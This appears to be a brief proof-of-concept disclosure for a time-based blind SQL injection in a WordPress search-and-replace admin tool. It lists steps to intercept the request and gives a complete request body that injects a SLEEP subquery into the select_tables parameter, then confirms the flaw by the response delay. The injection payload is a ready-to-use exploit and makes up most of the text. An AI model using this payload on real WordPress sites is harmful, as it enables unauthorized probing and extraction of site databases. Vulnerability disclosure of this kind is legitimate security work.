1. Go to the Tools parameter
2. Select Search & Replace
3. Click "Do Search & Replace"
4. Change the parameters and intercept the request
5. Put a vulnerable SQL query in the request, such as the following: `search=123&replace=1&csv=1&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export_or_save=1&action=search-replace&search-submit=123123"asdasd=''&insr_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace`
6. Notice that the response takes double seconds of the SLEEP(x-) number you insert.